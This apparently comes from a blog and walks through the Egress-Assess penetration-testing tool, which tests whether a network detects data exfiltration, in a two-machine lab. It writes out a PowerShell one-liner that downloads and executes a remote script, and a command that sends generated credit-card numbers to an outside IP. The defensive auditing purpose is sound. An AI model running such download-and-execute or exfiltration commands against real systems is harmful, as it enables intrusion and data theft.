Data Exfiltration Using Egress-Assess

Recently we came across tool by name Egress-Assess by Chris Truncer which demonstrates the capabilities of Data Exfiltration from Pentester perspective.

Below is small walkthrough of the tool.

Our setup consist of 2 machines to demo the tool.
Auditor Machine IP - 192.168.126.128 (Kali Linux)
Victim Machine IP - 192.168.126.130 (Windows 8.1)

Lets start installation and required dependencies of the application on auditor machine.

During installation, tool would generate the SSL certificate and ask you to enter the your information.(can be dummy data)

Lets check what all Egress Assess has to offer to us.

Current version of Egress Assess supports Data Exfiltration by using below protocols.

Lets start the server on Auditors machine.

./Egress-Assess.py --server http

Confirming the same 

On Victim machine fire-up the powershell prompt and hit the below shown ps command. (Internet connectivity is required)

IEX (New-Object Net.Webclient).DownloadString(‘https://raw.githubusercontent.com/ChrisTruncer/Egress-Assess/master/Invoke-EgressAssess.ps1‘)

Then fire the below command to generate fake CC numbers and send to Auditor machine over HTTP.

Invoke-EgressAssess -client http -datatype cc -Verbose -ip 192.168.63.149

After the some time, the victim has sent entire data consisting of CC Numbers to Auditor machine ( i.e. Egress Server)

On Auditors Machine the data is successfully received.

The received data is stored in Egress-Assess data folder with file transfers data stamps.

Received CC data

After this we can check where all our Data Exfiltration is flagged on customer end. If its not flagged anywhere, it means you got the point to raise. (i.e. Point of concern for customer)

Similarly we can use the different protocols supported by tool now.